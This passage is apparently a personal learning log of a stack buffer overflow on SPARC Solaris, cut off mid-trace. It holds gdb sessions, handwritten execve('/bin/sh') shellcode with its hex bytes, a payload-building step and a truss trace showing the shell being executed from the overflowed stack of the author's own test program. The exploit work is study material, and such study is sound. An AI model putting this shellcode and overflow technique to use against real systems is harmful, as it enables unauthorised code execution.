continue, or q to quit--- 0xffbeff70: 0x702f626c 0x61646537 0x345f7364 0x30672f62 (gdb) si 17 } (gdb) 0x00010798 17 } (gdb) x/4i $pc 0x10798 <main+64>: ret 0x1079c <main+68>: restore 0x107a0 <main+72>: retl 0x107a4 <main+76>: add %o7, %l7, %l7 (gdb) si 0x0001079c 17 } (gdb) 0xffbeff00 in ?? () (gdb) x/16i $pc 0xffbeff00: sethi %hi(0x48656c00), %o0 0xffbeff04: or %o0, 0x6c, %o0 ! 0x48656c6c 0xffbeff08: st %o0, [ %sp + 0x54 ] 0xffbeff0c: sethi %hi(0x6f0a0000), %o0 0xffbeff10: st %o0, [ %sp + 0x58 ] 0xffbeff14: add %sp, 0x54, %o1 0xffbeff18: mov 1, %o0 0xffbeff1c: mov 7, %o2 0xffbeff20: mov 4, %g1 0xffbeff24: ta 8 0xffbeff28: mov 1, %g1 0xffbeff2c: clr %o0 0xffbeff30: ta 8 0xffbeff34: unimp 0x2000 0xffbeff38: unimp 0x7d0 0xffbeff3c: unimp 0x1caf (gdb) si 0xffbeff04 in ?? () (gdb) 0xffbeff08 in ?? () (gdb) 0xffbeff0c in ?? () (gdb) 0xffbeff10 in ?? () (gdb) 0xffbeff14 in ?? () (gdb) 0xffbeff18 in ?? () (gdb) 0xffbeff1c in ?? () (gdb) 0xffbeff20 in ?? () (gdb) 0xffbeff24 in ?? () (gdb) Hello 0xffbeff28 in ?? () (gdb) 0xffbeff2c in ?? () (gdb) 0xffbeff30 in ?? () (gdb) Program exited normally. (gdb) del Delete all breakpoints? (y or n) y (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Hello Program exited normally. (gdb) q bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload sp = 0xffbefd90 Hello bazz@blade72[pts/1][~/tools/tmp/latest]
OK I clearly demonstrated how the write example buffer overflow hijacked just fine.
But now.. a shell spawn fails, and I don’t know why:
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S .globl main main: set 0x2f62696e, %o0 st %o0, [%sp+84] set 0x2f736800, %o0 st %o0, [%sp+88] add %sp, 84, %o0 clr [%sp+92] st %o0, [%sp+76] clr [%sp+80] add %sp, 76, %o1 xor %o5,%o5,%o2 mov 0x3b, %g1 ta 8 !ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) mov 1, %g1 ta 8 bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3 bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin 000000 110bd89a 9012216e d023a054 110bdcda 000010 d023a058 9003a054 c023a05c d023a04c 000020 c023a050 9203a04c 941b400d 8210203b 000030 91d02008 901b400d 82102001 91d02008 000040 bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) b 16 Breakpoint 1 at 0x10790: file v.c, line 16. (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Breakpoint 1, main () at v.c:16 16 return 0; (gdb) x/96x $sp 0xffbefe00: 0x03515151 0x03525252 0x03535353 0x03545454 0xffbefe10: 0x03555555 0x03565656 0x03575757 0x03585858 0xffbefe20: 0x03595959 0x035a5a5a 0x04414141 0x04424242 0xffbefe30: 0x04434343 0x04444444 0xffbefd78 0xffbefef8 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefec0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefed0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefee0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefef0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbeff00: 0x110bd89a 0x9012216e 0xd023a054 0x110bdcda 0xffbeff10: 0xd023a058 0x9003a054 0xc023a05c 0xd023a04c 0xffbeff20: 0xc023a050 0x9203a04c 0x941b400d 0x8210203b 0xffbeff30: 0x91d02008 0x901b400d 0x82102001 0x91d02008 0xffbeff40: 0x000007d1 0x00001caf 0x000007d2 0x00002801 0xffbeff50: 0x000007d3 0x00002801 0x000007d9 0x00000007 0xffbeff60: 0x00000000 0x00000000 0x2f6e6f62 0x61636b75 ---Type <return> to continue, or q <return> to quit--- 0xffbeff70: 0x702f626c 0x61646537 0x345f7364 0x30672f62 (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0xff3b3be0 in ?? () (gdb) c Continuing. Program exited normally. # NO SHELL!!! (gdb) q bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload sp = 0xffbefd90 bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Program received signal SIGTRAP, Trace/breakpoint trap. 0xff3b3be0 in ?? () (gdb) x/16i $pc 0xff3b3be0: b,a 0xff3b3bec 0xff3b3be4: b,a 0xff3b3bf0 0xff3b3be8: b,a 0xff3b3bf4 0xff3b3bec: mov %g0, %o0 0xff3b3bf0: save %sp, -160, %sp 0xff3b3bf4: call 0xff3b3bfc 0xff3b3bf8: sethi %hi(0x2c800), %l7 0xff3b3bfc: or %l7, 0x3b4, %l7 ! 0x2cbb4 0xff3b3c00: addcc %i0, %g0, %o0 0xff3b3c04: bne 0xff3b3c60 0xff3b3c08: add %l7, %o7, %l7 0xff3b3c0c: add %sp, 0x60, %o0 0xff3b3c10: mov 3, %l0 0xff3b3c14: st %l0, [ %o0 ] 0xff3b3c18: add %fp, 0x44, %l0 0xff3b3c1c: st %l0, [ %o0 + 4 ] (gdb) q The program is running. Exit anyway? (y or n) y bazz@blade72[pts/1][~/tools/tmp/latest]
I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….
TO BE CONTINUED
… UPDATE!!!!
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin -bash-4.3$ truss $PWD/invoke2 v < payload execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C) argc = 3 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/usr/lib/libcurses.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libcurses.so.1", "/usr/lib/libcurses.so.1", 1023) = 23 open("/usr/lib/libcurses.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x08F13AF8, 278528, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF340000 mmap(0xFF340000, 165416, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF340000 mmap(0xFF37A000, 28774, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 172032) = 0xFF37A000 mmap(0xFF382000, 6688, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF382000 munmap(0xFF36A000, 65536) = 0 memcntl(0xFF340000, 49420, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libsocket.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libsocket.so.1", "/usr/lib/libsocket.so.1", 1023) = 23 open("/usr/lib/libsocket.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x08F13EE0, 114688, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF320000 mmap(0xFF320000, 40558, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF320000 mmap(0xFF33A000, 4365, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 40960) = 0xFF33A000 munmap(0xFF32A000, 65536) = 0 memcntl(0xFF320000, 14496, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libnsl.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libnsl.so.1", "/usr/lib/libnsl.so.1", 1023) = 20 open("/usr/lib/libnsl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x08F142C8, 655360, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF200000 mmap(0xFF200000, 582266, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF200000 mmap(0xFF290000, 33320, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 589824) = 0xFF290000 mmap(0xFF29A000, 23376, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF29A000 memcntl(0xFF200000, 84064, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x08F19CA0, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF310000 mmap(0xFF310000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF310000 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF300000 close(3) = 0 stat("/usr/lib/libc.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x09899EB0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF100000 mmap(0xFF100000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF100000 mmap(0xFF1BC000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF1BC000 munmap(0xFF1AC000, 65536) = 0 memcntl(0xFF100000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libmp.so.2", 0xFFBEF620) = 0 resolvepath("/usr/lib/libmp.so.2", "/usr/lib/libmp.so.2", 1023) = 19 open("/usr/lib/libmp.so.2", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x09899AC8, 90112, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2E0000 mmap(0xFF2E0000, 11316, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2E0000 mmap(0xFF2F4000, 865, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 16384) = 0xFF2F4000 munmap(0xFF2E4000, 65536) = 0 memcntl(0xFF2E0000, 3124, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF338) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2D0000 mmap(0xFF2D0000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2D0000 close(3) = 0 munmap(0xFF390000, 8192) = 0 getcontext(0xFFBEFA88) open64("/dev/tty", O_RDWR|O_NONBLOCK) = 3 close(3) = 0 brk(0x0010A060) = 0 sysconfig(_CONFIG_PAGESIZE) = 8192 brk(0x0010A060) = 0 brk(0x0010C000) = 0 brk(0x0010E000) = 0 getuid() = 100 [100] getgid() = 10 [10] getuid() = 100 [100] getgid() = 10 [10] getcontext(0xFFBEFA88) time() = 1413348374 brk(0x00110000) = 0 brk(0x00112000) = 0 sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigprocmask(SIG_BLOCK, 0x00000000, 0x0010A020) = 0 sigfillset(0xFF1C28D0) = 0 sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0 uname(0xFFBEF5D8) = 1 stat64("/home/bazz/latest", 0xFFBEF928) = 0 stat64(".", 0xFFBEF890) = 0 getpid() = 2098 [2097] getpid() = 2098 [2097] getpid() = 2098 [2097] getpgrp() = 2097 sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0 sysconfig(_CONFIG_CHILD_MAX) = 7893 getcontext(0xFFBEFA88) open64("/home/bazz/latest/invoke2", O_RDONLY) = 3 ioctl(3, TCGETA, 0xFFBEFAE4) Err#25 ENOTTY llseek(3, 0, SEEK_CUR) = 0 read(3, " # ! / b i n / b a s h\n".., 80) = 80 llseek(3, 0, SEEK_SET) = 0 getrlimit(RLIMIT_NOFILE, 0xFFBEFA78) = 0 fcntl(255, F_GETFD, 0xFFBEFAE4) Err#9 EBADF fcntl(3, F_DUP2FD, 0x000000FF) = 255 close(3) = 0 fcntl(255, F_SETFD, 0x00000001) = 0 fcntl(255, F_GETFL, 0x00000000) = 8192 fstat64(255, 0xFFBEFAD8) = 0 fstat64(255, 0xFFBEFB30) = 0 llseek(255, 0, SEEK_CUR) = 0 getcontext(0xFFBEFA08) read(255, " # ! / b i n / b a s h\n".., 718) = 718 getcontext(0xFFBEFA08) getcontext(0xFFBEFA08) brk(0x00114000) = 0 getcontext(0xFFBEF390) getcontext(0xFFBEFA08) getcontext(0xFFBEFA08) sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF6B8) = 0 getcontext(0xFFBEF488) brk(0x00116000) = 0 pipe() = 3 [4] sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF67C, 0xFFBEF66C) = 0 llseek(255, 0xFFFFFFFFFFFFFE63, SEEK_CUR) = 305 fork() = 2099 sigprocmask(SIG_SETMASK, 0xFFBEF66C, 0x00000000) = 0 Received signal #18, SIGCLD [caught] siginfo: SIGCLD CLD_EXITED pid=2099 status=0x0001 waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) = 0 waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD setcontext(0xFFBEF350) sigaction(SIGCLD, 0xFFBEF5D0, 0xFFBEF650) = 0 close(4) = 0 read(3, " 0\n", 128) = 2 read(3, 0xFFBEF710, 128) = 0 close(3) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670) = 0 sigaction(SIGINT, 0xFFBEF538, 0xFFBEF5B8) = 0 sigaction(SIGINT, 0xFFBEF4C8, 0xFFBEF548) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0 getcontext(0xFFBEFA08) read(255, " p r o g = $ ( / h o m e".., 718) = 413 sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF4D0) = 0 getcontext(0xFFBEF2A0) pipe() = 3 [4] sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF494, 0xFFBEF484) = 0 llseek(255, 0xFFFFFFFFFFFFFE89, SEEK_CUR) = 343 fork() = 2100 sigprocmask(SIG_SETMASK, 0xFFBEF484, 0x00000000) = 0 Received signal #18, SIGCLD [caught] siginfo: SIGCLD CLD_EXITED pid=2100 status=0x0000 waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) = 0 waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD setcontext(0xFFBEF168) sigaction(SIGCLD, 0xFFBEF3E8, 0xFFBEF468) = 0 close(4) = 0 read(3, " / h o m e / b a z z / l".., 128) = 20 read(3, 0xFFBEF528, 128) = 0 close(3) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488) = 0 sigaction(SIGINT, 0xFFBEF350, 0xFFBEF3D0) = 0 sigaction(SIGINT, 0xFFBEF2E0, 0xFFBEF360) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0 getcontext(0xFFBEFA08) read(255, " s h i f t\n i f [ -".., 718) = 375 getcontext(0xFFBEFA08) getcontext(0xFFBEF4E0) getcontext(0xFFBEF4E0) setcontext(0xFFBEF4E0) sigaction(SIGINT, 0xFFBEF5E0, 0xFFBEF660) = 0 sigaction(SIGQUIT, 0xFFBEF5E0, 0xFFBEF660) = 0 sigaction(SIGCLD, 0xFFBEF5E0, 0xFFBEF660) = 0 execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908) argc = 5 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/tools/gcc-3.4.2/lib/libc.so.1", 0xFFBEF638) Err#2 ENOENT stat("/usr/lib/libc.so.1", 0xFFBEF638) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x10B0A4E0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000 mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000 mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000 munmap(0xFF32C000, 65536) = 0 memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF638) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x1018CDC8, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000 mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF350) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000 mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000 close(3) = 0 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000 munmap(0xFF390000, 8192) = 0 brk(0x000310C8) = 0 brk(0x000330C8) = 0 getuid() = 100 [100] getuid() = 100 [100] execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0) argc = 1 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/usr/lib/libc.so.1", 0xFFBEF7F0) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x127A87A0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000 mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000 mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000 munmap(0xFF32C000, 65536) = 0 memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF7F0) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x127A4538, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000 mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF508) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000 mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000 close(3) = 0 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000 munmap(0xFF390000, 8192) = 0 sp = 0xwrite(2, " s p = 0 x", 7) = 7 ffbefdb8write(2, " f f b e f d b 8", 8) = 8 write(2, "\n", 1) = 1 ioctl(0, TCGETA, 0xFFBEFB54) Err#25 ENOTTY fstat64(0, 0xFFBEFBC8) = 0 brk(0x00020B00) = 0 brk(0x00024B00) = 0 read(0, "01 A A A01 B B B01 C C C".., 8192) = 421 read(0, 0x00020B0C, 8192) = 0 execve("/bin/sh", 0xFFBEFEB0, 0x00000000) argc = 2 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/usr/lib/libgen.so.1", 0xFFBEF828) = 0 resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20 open("/usr/lib/libgen.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000 mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000 mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000 munmap(0xFF376000, 65536) = 0 memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libc.so.1", 0xFFBEF828) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000 mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000 mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000 munmap(0xFF32C000, 65536) = 0 memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF828) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000 mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000 mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000 close(3) = 0 munmap(0xFF390000, 8192) = 0 getpid() = 2098 [2097] getpgid(2098) = 2097 getsid(2098) = 1819 brk(0x0003A108) = 0 sysconfig(_CONFIG_SIGRT_MIN) = 38 sysconfig(_CONFIG_SIGRT_MAX) = 45 sigaltstack(0xFFBEFE5C, 0x00000000) = 0 sigaction(SIGHUP, 0x00000000, 